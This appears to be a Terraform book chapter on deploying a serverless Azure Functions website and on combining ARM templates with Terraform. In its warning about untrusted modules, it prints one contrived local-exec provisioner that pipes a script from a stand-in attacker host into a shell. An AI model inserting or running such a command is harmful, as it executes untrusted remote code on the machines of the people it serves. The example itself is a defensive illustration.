Serverless is one of the biggest marketing gimmicks of all time. It seems like everything is marketed as “serverless” these days, despite nobody being able to agree on what the word means. Serverless definitely does not refer to the elimination of servers; it usually means the opposite, since distributed systems often involve many more servers than traditional designs do.
One thing that can be agreed on is that serverless is not a single technology; it’s a suite of related technologies sharing two key characteristics:
Pay-as-you-go billing—Paying for the actual quantity of resources consumed rather than pre-purchased units of capacity (i.e. pay for what you use, not what you don’t use).
Minimal operational overhead—The cloud provider takes on most or all responsibility for scaling, maintaining, and managing the service.
There are many benefits to choosing serverless, chief among them that less work is required, but the tradeoff is that you have less control. If on-premises data centers require the most work (and grant the most control) and software as a service (SaaS) requires the least work (and offers the least control), then serverless sits between these extremes, edging closer to SaaS (see figure 5.1).
Figure 5.1 Serverless is an umbrella term for technologies ranging between platform as a service (PaaS) and software as a service (SaaS).
In this chapter, we deploy an Azure Functions website with Terraform. Azure Functions is a serverless technology similar to AWS Lambda or Google Cloud Functions, which allows you to run code without worrying about servers. Our web architecture will be similar to what we deployed in chapter 4, but serverless.
This scenario is something I like to call “the two-penny website” because that’s how much I estimate it will cost to run every month. If you can scrounge some coins from between your sofa cushions, you’ll be good for at least a year of web hosting. For most low-traffic web applications, the true cost will likely be even less, perhaps even rounding down to nothing.
The website we will deploy is a ballroom dancing forum called Ballroom Dancers Anonymous. Unauthenticated users can leave public comments that are displayed on the website and stored in a database. The design is fairly simple, making it well suited for use in other applications. A sneak peek of the final product is shown in figure 5.2.
Figure 5.2 Ballroom Dancers Anonymous website
We will use Azure to deploy the serverless website, but it shouldn’t feel any different than deploying to AWS. A basic deployment strategy is shown in figure 5.3.
Figure 5.3 Deploying to Azure is no different from deploying to AWS.
Note If you would like to see an AWS Lambda example, I recommend taking a look at the source code for the pet store module deployed in chapter 11.
Although the website costs only pennies to run, it is by no means a toy. Because it’s deployed on Azure Functions, it can rapidly scale out to handle tremendous spikes in traffic and do so with low latency. It also uses HTTPS (something the previous chapter’s scenario did not) and a NoSQL database, and it serves both static content (HTML/CSS/JS) and a REST API. Figure 5.4 shows an architecture diagram.
Figure 5.4 An Azure function app listens for HTTP requests coming from the internet. When a request is made, it starts a just-in-time web server from source code located in a storage container. All stateful data is stored in a NoSQL database using a service called Azure Table Storage.
Because the code we’re writing is relatively short and cohesive, it’s best to put it all in a single main.tf file instead of using nested modules.
Tip As a rule of thumb, I suggest having no more than a few hundred lines of code per Terraform file. Any more, and it becomes difficult to build a mental map of how the code works. Of course, the exact number is for you to decide.
If we are not going to use nested modules, how should we organize the code so that it’s easy to read and understand? As discussed in chapter 4, organizing code by number of dependencies is a sound approach: resources with fewer dependencies go toward the top of the file, and resources with more dependencies go toward the bottom. Still, this leaves room for ambiguity, especially when two resources have the same number of dependencies.
Organizing by some characteristic in addition to the number of resource dependencies (henceforth called size) is a common strategy for writing clean Terraform code. The idea is to first group related resources, then sort each group by size, and finally arrange the groups so the overall trend is increasing size (see figure 5.5). This makes your code both easy to read and easy to understand.
Figure 5.5 Configuration files should be sorted first by group and then by size. The overall trend is increasing size.
Just as it’s quicker to search for a word in a dictionary than a word-search puzzle, it’s faster to find what you’re looking for when your code is organized in a sensible manner (such as the sorting pattern shown in figure 5.5). I have divided this project into four groups, each serving a specific purpose in the overall application deployment. These groups are as follows:
Resource group—An Azure resource that acts as a container for a project’s resources. The resource group and other base-level resources reside at the top of main.tf because they do not depend on any other resource.
Storage container—Similar to an S3 bucket, an Azure storage container stores the versioned build artifact (source code) that will be used by Azure Functions. The underlying storage account also serves a dual purpose as the NoSQL database.
Storage blob—This is like an S3 object and is uploaded to the storage container.
Azure Functions app—Anything related to deploying and configuring an Azure Functions app is considered part of this group.
The overall architecture is illustrated in figure 5.6.
Figure 5.6 The project has four main groups, each serving a distinct purpose.
Finally, we need to consider inputs and outputs. There are two input variables: location and namespace. location is used to configure the Azure region, while namespace provides a consistent naming scheme, as we have seen before. The sole output value is website_url, which is a link to the final website (see figure 5.7).
Figure 5.7 Overall input variables and output values of the root module
Recall that we need to create four groups: the resource group, the storage container, the storage blob, and the Azure Functions app.
Before jumping into the code, we need to authenticate to Microsoft Azure and set the required input variables. Refer to appendix B for a tutorial on authenticating to Azure using the CLI method.
After you’ve obtained credentials to Azure, create a new workspace containing three files: variables.tf, terraform.tfvars, and providers.tf. Then insert the contents of the following listing into variables.tf.
variable "location" { type = string default = "westus2" } variable "namespace" { type = string default = "ballroominaction" }
Now we will set the variables; the next listing shows the contents of terraform.tfvars. Technically, we don’t need to set location or namespace, since the defaults are fine, but it’s always a good idea to be thorough.
location = "westus2" namespace = "ballroominaction"
Since I expect you to obtain credentials via the CLI login, the Azure provider declaration is empty. If you are using one of the other methods, it may not be.
TIP Whatever you do, do not hardcode secrets in the Terraform configuration. You do not want to accidentally check sensitive information into version control. We discuss how to manage secrets in chapters 6 and 13.
provider "azurerm" { features {} }
Now we’re ready to write the code for the first of the four groups (see figure 5.8). Before we continue, I want to clarify what resource groups are, in case you are not familiar with them.
Figure 5.8 Development roadmap—step 1 of 4
In Azure, all resources must be deployed into a resource group, which is essentially a container that stores references to resources. Resource groups are convenient because if a resource group is deleted, all of the resources it contains are also deleted. Each Terraform deployment should get its own resource group to make it easier to keep track of resources (much like tagging in AWS). Resource groups are not unique to Azure—there are equivalents in AWS (https://docs.aws.amazon.com/ARG/latest/userguide/welcome.html) and Google Cloud (https://cloud.google.com/storage/docs/projects)—but Azure is the only cloud that compels their use. The code for creating a resource group is shown next.
resource "azurerm_resource_group" "default" { name = local.namespace location = var.location }
In addition to the resource group, we want to use the Random provider again to ensure sufficient randomness beyond what the namespace variable supplies. This is because some resources in Azure must be unique not only within your account but globally (i.e. across all Azure accounts). The code in listing 5.5 shows how to accomplish this by joining var.namespace with the result of random_string to effectively create right padding. Add this code before the azurerm_resource_group resource to make the dependency relationship clear.
resource "random_string" "rand" { length = 24 special = false upper = false } locals { namespace = substr(join("-", [var.namespace, random_string.rand.result]), ➥ 0, 24) ❶ }
❶ Adds a right pad to the namespace variable and stores the result in a local value
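To see what the local evaluates to, here is a quick sketch in terraform console (the 24-character random string is invented for illustration):

$ terraform console
> substr(join("-", ["ballroominaction", "23sr1wfvzwmlmghjuops2bw9"]), 0, 24)
"ballroominaction-23sr1wf"

join produces a 41-character string here, and substr truncates it back down to the 24-character maximum that some Azure resource names impose.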
We will now use an Azure storage container to store the application source code, plus a NoSQL database to store documents (see figure 5.9). The NoSQL database is technically a separate service, known as Azure Table Storage, but it’s really just a NoSQL wrapper around ordinary key-value pairs.
Figure 5.9 Development roadmap—step 2 of 4
Provisioning a container in Azure is a two-step process. First, you create a storage account, which specifies some metadata about where the data will be stored and how much redundancy/data replication you’d like; I recommend sticking with the standard values, as they strike a good balance between cost and durability. Second, you create the container itself. Following is the code for both steps.
resource "azurerm_storage_account" "storage_account" { name = random_string.rand.result resource_group_name = azurerm_resource_group.default.name location = azurerm_resource_group.default.location account_tier = "Standard" account_replication_type = "LRS" } resource "azurerm_storage_container" "storage_container" { name = "serverless" storage_account_name = azurerm_storage_account.storage_account.name container_access_type = "private" }
Note This is the place to add a container for static website hosting in Azure Storage. For this project, it isn’t necessary because Azure Functions will serve the static content along with the REST API (which is not ideal).
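If you did want Azure Storage to serve the static assets directly, a minimal sketch looks like the following (assuming the static_website block available in azurerm 2.x; the account name is a hypothetical placeholder and must be globally unique):

resource "azurerm_storage_account" "static_site" {
  name                     = "staticsiteexample123"
  resource_group_name      = azurerm_resource_group.default.name
  location                 = azurerm_resource_group.default.location
  account_tier             = "Standard"
  account_replication_type = "LRS"

  static_website {
    index_document     = "index.html"
    error_404_document = "404.html"
  }
}

Azure then serves whatever you upload to the special $web container. We skip this here because the function app serves the static content itself.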
One of the things I like best about Azure Functions is that it gives you many different options for how to deploy your source code. For this scenario, we’ll run the app from a zip package referenced by a publicly accessible URL, because that method allows us to deploy the project with a single terraform apply command. So now we have to upload a storage blob to the storage container (see figure 5.10).
Figure 5.10 Development roadmap—step 3 of 4
At this point, you may be wondering where the source code zip file comes from. Normally, you would already have it on your machine, or it would be downloaded before Terraform executes as part of a continuous integration / continuous delivery (CI/CD) pipeline. Since I wanted this to work with no additional steps, I’ve packaged the source code zip into a Terraform module instead.
Remote modules can be fetched from the Terraform Registry with either terraform init or terraform get. Crucially, it isn’t just the Terraform configuration that gets downloaded: everything in the module does. Therefore, I have stored the entire application source code in a shim module so that it can be downloaded with terraform init. Figure 5.11 illustrates how this was done.
Figure 5.11 Registering a shim module with the Terraform Registry
WARNING Modules can execute malicious code on your local machine by taking advantage of local-exec provisioners. You should always skim the source code of an untrusted module before deploying it.
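To make the risk concrete, here is a contrived sketch of what a hostile module could contain. Nothing in the ballroom module does this, but Terraform would happily execute it during terraform apply:

resource "null_resource" "not_so_innocent" {
  provisioner "local-exec" {
    # Runs an arbitrary shell command on your machine, with your privileges
    command = "curl -s https://evil.example.com/payload.sh | sh"
  }
}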
The shim module is a mechanism for downloading the build artifact onto your local machine. It’s certainly not best practice, but it is an interesting technique, and it’s convenient for our purposes. Add the following code to main.tf to do this.
module "ballroom" { source = "terraform-in-action/ballroom/azure" } resource "azurerm_storage_blob" "storage_blob" { name = "server.zip" storage_account_name = azurerm_storage_account.storage_account.name storage_container_name = azurerm_storage_container.storage_container.name type = "Block" source = module.ballroom.output_path }
We will now write the code for the function app (figure 5.12). I wish I could say it was all smooth sailing from here on out, but sadly, that is not the case. The function app needs to be able to download the application source code from the private storage container, which requires a URL that is presigned by a shared access signature (SAS) token.
Figure 5.12 Development roadmap—step 4 of 4
Lucky for us, there is a data source for producing the SAS token with Terraform (although it is more verbose than it probably needs to be). The code in listing 5.8 creates a SAS token that allows the invoker to read from an object in the container with an expiry date set in 2048 (Azure Functions continuously uses this token to download the storage blob, so the expiry must be set far in the future).
data "azurerm_storage_account_sas" "storage_sas" { connection_string = azurerm_storage_account.storage_account ➥ .primary_connection_string resource_types { service = false container = false object = true } services { blob = true queue = false table = false file = false } start = "2016-06-19T00:00:00Z" expiry = "2048-06-19T00:00:00Z" permissions { read = true ❶ write = false delete = false list = false add = false create = false update = false process = false } }
❶ Read-only permissions to blobs in container storage
Now that we have the SAS token, we need to generate the presigned URL. It would be wonderful if there were a data source to do this, but there is not. The expression is fairly long, so I took the liberty of assigning it to a local value for readability. Add this code to main.tf.
locals {
  package_url = "https://${azurerm_storage_account.storage_account.name}.blob.core.windows.net/${azurerm_storage_container.storage_container.name}/${azurerm_storage_blob.storage_blob.name}${data.azurerm_storage_account_sas.storage_sas.sas}"
}
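The result is a presigned URL of the general shape https://<storage-account>.blob.core.windows.net/serverless/server.zip?<sas-token>, which Azure Functions can fetch without any further authentication.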
Finally, add the code for creating an azurerm_application_insights resource (required for instrumentation and logging) and the azurerm_function_app resource itself.
resource "azurerm_app_service_plan" "plan" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name kind = "functionapp" sku { tier = "Dynamic" size = "Y1" } } resource "azurerm_application_insights" "application_insights" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name application_type = "web" } resource "azurerm_function_app" "function" { name = local.namespace location = azurerm_resource_group.default.location resource_group_name = azurerm_resource_group.default.name app_service_plan_id = azurerm_app_service_plan.plan.id https_only = true storage_account_name = azurerm_storage_account.storage_account.name storage_account_access_key = azurerm_storage_account.storage_account ➥ .primary_access_key version = "~2" app_settings = { FUNCTIONS_WORKER_RUNTIME = "node" WEBSITE_RUN_FROM_PACKAGE = local.package_url ❶ WEBSITE_NODE_DEFAULT_VERSION = "10.14.1" APPINSIGHTS_INSTRUMENTATIONKEY = azurerm_application_insights ➥ .application_insights.instrumentation_key TABLES_CONNECTION_STRING = data.azurerm_storage_account_sas ➥ .storage_sas.connection_string ❷ AzureWebJobsDisableHomepage = true } }
❶ Points to the build artifact
❷ Allows the app to connect to the database
We’re in the home stretch! All we have to do now is version-lock the providers and set the output value so that we’ll have an easy link to the deployed website. Create a new file called versions.tf, and insert the following code.
terraform {
  required_version = ">= 0.15"
  required_providers {
    azurerm = {
      source  = "hashicorp/azurerm"
      version = "~> 2.47"
    }
    archive = {
      source  = "hashicorp/archive"
      version = "~> 2.0"
    }
    random = {
      source  = "hashicorp/random"
      version = "~> 3.0"
    }
  }
}
The outputs.tf file is also quite simple.
output "website_url" { value = "https://${local.namespace}.azurewebsites.net/" }
For your reference, the complete code from main.tf is shown next.
Listing 5.13 Complete code for main.tf
resource "random_string" "rand" {
length = 24
special = false
upper = false
}
locals {
namespace = substr(join("-", [var.namespace, random_string.rand.result]),
0, 24)
}
resource "azurerm_resource_group" "default" {
name = local.namespace
location = var.location
}
resource "azurerm_storage_account" "storage_account" {
name = random_string.rand.result
resource_group_name = azurerm_resource_group.default.name
location = azurerm_resource_group.default.location
account_tier = "Standard"
account_replication_type = "LRS"
}
resource "azurerm_storage_container" "storage_container" {
name = "serverless"
storage_account_name = azurerm_storage_account.storage_account.name
container_access_type = "private"
}
module "ballroom" {
source = "terraform-in-action/ballroom/azure"
}
resource "azurerm_storage_blob" "storage_blob" {
name = "server.zip"
storage_account_name = azurerm_storage_account.storage_account.name
storage_container_name = azurerm_storage_container.storage_container.name
type = "Block"
source = module.ballroom.output_path
}
data "azurerm_storage_account_sas" "storage_sas" {
connection_string =
azurerm_storage_account.storage_account.primary_connection_string
resource_types {
service = false
container = false
object = true
}
services {
blob = true
queue = false
table = false
file = false
}
start = "2016-06-19T00:00:00Z"
expiry = "2048-06-19T00:00:00Z"
permissions {
read = true
write = false
delete = false
list = false
add = false
create = false
update = false
process = false
}
}
locals {
package_url = "https://${azurerm_storage_account.storage_account.name}
➥ .blob.core.windows.
net/${azurerm_storage_container.storage_container.name}/${azurerm_storage_b
lob.storage_blob.name}${data.azurerm_storage_account_sas.storage_sas.sas}"
}
resource "azurerm_app_service_plan" "plan" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
kind = "functionapp"
sku {
tier = "Dynamic"
size = "Y1"
}
}
resource "azurerm_application_insights" "application_insights" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
application_type = "web"
}
resource "azurerm_function_app" "function" {
name = local.namespace
location = azurerm_resource_group.default.location
resource_group_name = azurerm_resource_group.default.name
app_service_plan_id = azurerm_app_service_plan.plan.id
https_only = true
storage_account_name = azurerm_storage_account.storage_account.name
storage_account_access_key =
azurerm_storage_account.storage_account.primary_access_key
version = "~2"
app_settings = {
FUNCTIONS_WORKER_RUNTIME = "node"
WEBSITE_RUN_FROM_PACKAGE = local.package_url
WEBSITE_NODE_DEFAULT_VERSION = "10.14.1"
APPINSIGHTS_INSTRUMENTATIONKEY = azurerm_application_insights.application_insights.instrumentation_key
TABLES_CONNECTION_STRING =
data.azurerm_storage_account_sas.storage_sas.connection_string
AzureWebJobsDisableHomepage = true
}
}
NOTE Some people like to declare local values all together at the top of the file, but I prefer to declare them next to the resources that use them. Either approach is valid.
We are done with the four steps required to set up the Azure serverless project and are ready to deploy! Run terraform init and terraform plan to initialize Terraform and verify that the configuration code is correct:
$ terraform init && terraform plan ... # azurerm_storage_container.storage_container will be created + resource "azurerm_storage_container" "storage_container" { + container_access_type = "private" + has_immutability_policy = (known after apply) + has_legal_hold = (known after apply) + id = (known after apply) + metadata = (known after apply) + name = "serverless" + properties = (known after apply) + resource_group_name = (known after apply) + storage_account_name = (known after apply) } # random_string.rand will be created + resource "random_string" "rand" { + id = (known after apply) + length = 24 + lower = true + min_lower = 0 + min_numeric = 0 + min_special = 0 + min_upper = 0 + number = true + result = (known after apply) + special = false + upper = false } Plan: 8 to add, 0 to change, 0 to destroy. Changes to Outputs: + website_url = (known after apply) _____________________________________________________________________________ Note: You didn't specify an "-out" parameter to save this plan, so Terraform can't guarantee that exactly these actions will be performed if "terraform apply" is subsequently run.
Next, deploy with terraform apply. The command and subsequent output are shown next.

Warning! You should probably run terraform plan first. I use terraform apply -auto-approve here only to save space.
$ terraform apply -auto-approve
...
azurerm_function_app.function: Still creating... [10s elapsed]
azurerm_function_app.function: Still creating... [20s elapsed]
azurerm_function_app.function: Still creating... [30s elapsed]
azurerm_function_app.function: Still creating... [40s elapsed]
azurerm_function_app.function: Creation complete after 48s
[id=/subscriptions/7deeca5c-dc46-45c0-8c4c-7c3068de3f63/resourceGroups/
ballroominaction/providers/Microsoft.Web/sites/ballroominaction-23sr1wf]

Apply complete! Resources: 8 added, 0 changed, 0 destroyed.

Outputs:

website_url = https://ballroominaction-23sr1wf.azurewebsites.net/
You can navigate to the deployed website in the browser. Figure 5.13 shows what this will look like.
Figure 5.13 Deployed Ballroom Dancers Anonymous website
NOTE It’s surprisingly hard to find simple examples for Azure serverless projects, so I’ve intentionally made the source code minimalistic. Feel free to peruse my work or use it as a template for your own serverless projects. You can find it on GitHub (https://github.com/terraform-in-action/terraform-azure-ballroom) or in the .terraform/modules/ballroom directory.
Don’t forget to call terraform destroy to clean up! This tears down all the infrastructure provisioned in Azure:
$ terraform destroy -auto-approve
...
azurerm_resource_group.default: Still destroying...
[id=/subscriptions/7deeca5c-dc46-45c0-8c4c-...de3f63/resourceGroups/ballroominaction, 1m30s elapsed]
azurerm_resource_group.default: Still destroying...
[id=/subscriptions/7deeca5c-dc46-45c0-8c4c-...de3f63/resourceGroups/ballroominaction, 1m40s elapsed]
azurerm_resource_group.default: Destruction complete after 1m48s

Destroy complete! Resources: 8 destroyed.
Azure Resource Manager (ARM) is Microsoft’s infrastructure as code (IaC) technology that allows you to provision resources to Azure using JSON configuration files. If you’ve ever used AWS CloudFormation or GCP Deployment Manager, it’s a lot like that, so most of the concepts from this section carry over to those technologies. Nowadays, Microsoft is heavily promoting Terraform over ARM, but legacy use cases of ARM still exist. The three cases where I find ARM useful are deploying resources that the Terraform provider does not yet support (or supports poorly), migrating legacy ARM code to Terraform, and generating configuration code for resources that were created in the console.
Back in ye olden days, when Terraform was still an emerging technology, Terraform providers didn’t enjoy the same level of support they have today (even for the major clouds). In Azure’s case, many resources were unsupported by Terraform long after their general availability (GA) release. For example, Azure IoT Hub was announced GA in 2016 but did not receive support in the Azure provider until over two years later. In that awkward gap period, if you wished to deploy an IoT Hub from Terraform, your best bet was to deploy an ARM template from Terraform:
resource "azurerm_template_deployment" "template_deployment" { name = "terraform-ARM-deployment" resource_group_name = azurerm_resource_group.resource_group.name template_body = file("${path.module}/templates/iot.json") deployment_mode = "Incremental" parameters = { IotHubs_my_iot_hub_name = "ghetto-hub" } }
This was a way of bridging the gap between what was possible with Terraform and what was possible with ARM. The same held true for unsupported resources in AWS and GCP, using AWS CloudFormation and GCP Deployment Manager.
As Terraform has matured, provider support has swelled to encompass more and more resources, and today you’d be hard-pressed to find a resource that Terraform doesn’t natively support. Regardless, there are still occasional situations where using an ARM template from Terraform could be a viable strategy for deploying a resource (even if there is a native Terraform resource to do this). Some Terraform resources are just poorly implemented, buggy, or otherwise lacking features, and ARM templates may be a better fit in these circumstances.
It’s likely that before you were using Terraform, you were using some other kind of deployment technology. Let’s assume, for the sake of argument, that you were using ARM templates (or CloudFormation, if you are on AWS). How do you migrate your old systems into Terraform without investing considerable time up front? By using the strangler façade pattern.
The strangler façade pattern is a pattern for migrating a legacy system to a new system by slowly replacing the legacy parts with new parts until the new system completely supersedes the old system. At that point, the old system may be safely decommissioned. It’s called the strangler façade pattern because the new system is said to “strangle” the legacy system until it dies off (see figure 5.14). You’ve probably encountered something like this, as it’s a fairly common strategy, especially for APIs and services that must uphold a service-level agreement (SLA).
Figure 5.14 The strangler façade pattern for migrating ARM to Terraform. You start with a huge ARM template wrapped with an azurerm_template_deployment resource and not much else. Over time, resources are taken out of the ARM template and configured as native Terraform resources. Eventually, you no longer need the ARM template because everything is now a managed Terraform resource.
This applies to Terraform because you can migrate legacy code written in ARM or CloudFormation by wrapping it with an azurerm_template_deployment or aws_cloudformation_stack resource. Over time, you can incrementally replace specific resources from the old ARM template or CloudFormation stack with native Terraform resources until you are entirely in Terraform.
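On the AWS side, the wrapper looks much the same. A minimal sketch (the stack name and template path are hypothetical):

resource "aws_cloudformation_stack" "legacy" {
  name          = "legacy-stack"
  template_body = file("${path.module}/templates/legacy.json")
}

Each migration step removes a resource from the template and re-declares it as a native Terraform resource, typically using terraform import to adopt the existing infrastructure without re-creating it.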
The most painful thing about Terraform is that it takes a lot of work to translate what you want into configuration code. It’s usually much easier to point and click around the console until you have what you want and then export that as a template.
Note A number of open source projects aim to address this problem, most notably Terraformer: https://github.com/GoogleCloudPlatform/terraformer. HashiCorp also promises that it will improve imports to natively support generating configuration code from deployed resources in a future release of Terraform.
This is exactly what Azure resource groups let you do. You can take any resource group that is currently deployed, export it as an ARM template file, and then deploy that template with Terraform (see figure 5.15).
Figure 5.15 You can take any resource group that is currently deployed, export it as an ARM template file, and then deploy that template with Terraform.
WARNING Generated ARM templates are not always a 1:1 mapping of what is currently deployed in a resource group. Refer to the Azure ARM documentation for a definitive reference on what is and is not currently supported: https://docs.microsoft.com/en-us/azure/templates.
The beauty (or curse) of this approach is that you can sketch your entire project in the console and deploy it via Terraform without having to write any configuration code (except a small amount of wrapper code). Sometime in the future, if you wanted to, you could then migrate this quick-and-dirty template to native Terraform using the strangler façade pattern mentioned in the previous section. I like to think of this trick as a form of rapid prototyping.
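The wrapper code amounts to a single azurerm_template_deployment pointing at the exported file. A sketch, assuming you saved the export as exported.json alongside your configuration and already have a resource group to deploy into:

resource "azurerm_template_deployment" "prototype" {
  name                = "console-prototype"
  resource_group_name = azurerm_resource_group.default.name
  template_body       = file("${path.module}/exported.json")
  deployment_mode     = "Incremental"
}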
Terraform is an infrastructure as code tool that facilitates serverless deployments with the same ease as deploying anything else. Although this chapter focused on Azure, deploying serverless onto AWS or GCP is analogous. In fact, the first version of this scenario was written for AWS; I switched it to Azure to create a better setup for the multi-cloud capstone project in chapter 8. If you are a fan of Azure, I regret to inform you that after chapter 8, we will resume using AWS for the remainder of the book.
The key takeaway from this chapter is that Terraform can solve various problems, but the way you approach designing Terraform modules is always the same. In the next chapter, we continue our discussion of modules and formally introduce the module registry.
Terraform orchestrates serverless deployments with ease. All the resources a serverless deployment needs can be packaged and deployed as part of a single module.
Code organization is paramount when designing Terraform modules. Generally, you should sort by group and then by size (i.e. number of resource dependencies).
Any files in a Terraform module are downloaded as part of terraform init or terraform get. Be careful, because this can lead to downloading and running potentially malicious code.
Azure Resource Manager (ARM) is an interesting technology that can be combined with Terraform to patch holes in Terraform or even allow you to skip writing Terraform configuration entirely. Use it sparingly, however, because it’s not a panacea.